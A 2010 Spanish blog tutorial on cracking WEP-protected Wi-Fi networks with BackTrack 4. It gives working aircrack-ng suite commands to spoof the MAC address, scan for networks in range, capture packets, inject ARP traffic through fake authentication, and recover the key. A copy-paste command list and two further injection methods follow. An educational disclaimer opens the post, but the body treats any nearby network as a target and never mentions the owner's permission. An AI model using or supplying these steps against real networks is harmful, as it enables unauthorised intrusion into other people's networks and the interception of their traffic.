viernes, 19 de marzo de 2010

COMO UTILIZAR EL BACKTRACK 4




IMPORTANTE: ESTE TUTORIAL ES CON FINES EDUCATIVOS Y QUE SIRVA PARA PODER AUDITAR LA SEGURIDAD INALAMBRICA DE UN RED, EL USO QUE SE LE DÉ ES RESPONSABILIDAD DE LAS PERSONAS QUE LO LLEVEN ACABO



Bueno antes que nada este es mi primer tutorial y hago este post ya que son pocos los tutoriales que estan en español y son un poco confusos, asi que lo voy a tratar de hacer de una forma que se pueda entender.

Hardware que yo utilice para realizar el tutorial:
HPCompaq nx6125 con tarjeta inalambrica Broadcom b43

(NOTA: Verificar si tu tarjeta de red inalambrica es compatible con backtrack de preferencia la tarjeta inalambric debe ser una atheros, si no compruebalo en el siguiente link:

http://www.backtrack-linux.org/forums/hardware-compatibility-list/

Software utilizado:
Live CD de BackTrack 4.


Cuando ya lo hayas bajado y quemado pues introduce el CD en tu cd-rom y reinicia la computadora y has que se botee desde el cd de backtrack)

Aparecerá un menu con diversas opciones en las cuales estan:

Start BackTrack FrameBuffer (1024x768)
Start BackTrack FrameBuffer (800x600)
Start BackTrack Forensics (no swap)
Start BackTrack in Safe Graphical Mode
Start Persistent Live Cd
Start BackTrackin Text Mode
Start BackTrackin Graphical Mode from RAM
Memory Test
Boot the First Hard Disk



La verdad solo he probado 2 o 3 opciones, las cuales para mi son lo mismo solo en lo que cambia, es la resolucion de la pantalla (en las 2 primeras) y la opcion 6 es como entrar a Modo Seguro
(modo a prueba de fallos) en Windows.

Posteriormente de que eliges la opcion de tu eleccion se cargarán los controladores y una vez que hayas entrado al modo consola (como ms-dos) aparecera:

"root@bt: ~#"

deberas escribir:
startx,

Con esta instruccion iniciara el modo grafico y veras como se van cargando los diversos segmentos

Cuando escuches un sonido, es que ya cargo y esta listo para ser utilizado.

Bueno ahora viene lo bueno, abre una ventana de terminal o consola (que esta localizada en la parte de abajo es la 5ta al lado del fire fox) y escribe lo siguiente:

airmon-ng

Aqui te va a decir cual es tu tarjeta inalambrica, lo normal es que salga wlan0, o eth0, o eth1, cosas asi por el estilo, tu te vas a dar cuenta de cual es, en mi caso es la wlan0.

Luego introduce los siguientes comandos:

Para cambiar la mac escribe los sigueintes comandos:

macchanger --mac 00:11:22:33:44:55 wlan0 <--- la mac puede ser la que gustes, no necesita ser la misma

Con este comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 (el resultado se vera mas abajo)

Ahora vas a proceder a ver las redes inalambricas que estan a tu alcance con el siguiente comando:

airodump-ng wlan0

Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalambrica).

Sé que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que indique.

Cuando selecciones la red inalambrica que vamos a atacar apreta Ctrl + C para frenar el proceso (ya que si no lo hacemos de esta forma posteriormente nos causar conflicto) y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.

Para explicar bien esta parte vamos a poner un ejemplo:
BSSID CHN ESSID
66:77:88:99:00:11 6 ejemplo(por lo gral salen INFINITUM 1234

Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:

airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto estan en la direccion /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica

Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados, para poder descifrar una wep es necesario 20,000 paquetes.

Te daras cuenta que puede ir muy lento, esto significa que ninguna persona esta utilizando la red entonces no esta generando trafico y te podria llevar dias llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseñare como generar trafico en la red.

Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes comandos:

aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando

Luego cuando salgan 4 lineas de codigos y te diga que la conexion esta succesfuld, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razon no se puede conectar algunas de las razones son las siguientes:
-La red a la que quieres atacar esta muy lejos
-Tu tarjeta de red no puede hacer inyeccion de paquetes
-El router tiene seguridad para evitar este tipo de ataques

Ahora para inyectarle el trafico introducce el siguientes comando:

aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0
Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te daras cuenta que la DATA va caminando muy rapido.

Ahora abre otra terminal (consola) e introduce el siguiente comando:
aircrack-ng prueba-01.cap
Donde:
-Prueba-01.cap es el archivo donde se estan capturando los datos

Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o numeros de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalambrica seria 1234567890.

Bueno para aquellos que quieren probar aqui les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:

# airmon-ng
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap




Como se daran cuenta son pocos comandos pero llevan mucha explicacion y lo trate de hacer lo mas sencillo posible.

Para aquellos que quieren probar otras formas de inyeccion aqui les dejo otras dos formas que me han funcionado perfecto:

Forma 2:
# aireplay-ng -1 0 -a -h -e wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

Forma 3:
# aireplay-ng -1 0 -a -h -e wlan0
# aireplay-ng -5 -b -h wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a -h -k 255.255.255.255 -l 255.255.255.255 -y -w ARP
# aireplay-ng -2 -r ARP wlan0

Cualquier duda me la hacen saber y les tratare de ayudar en lo que pueda.

Gracias, comenten por favor, es mi segundo post.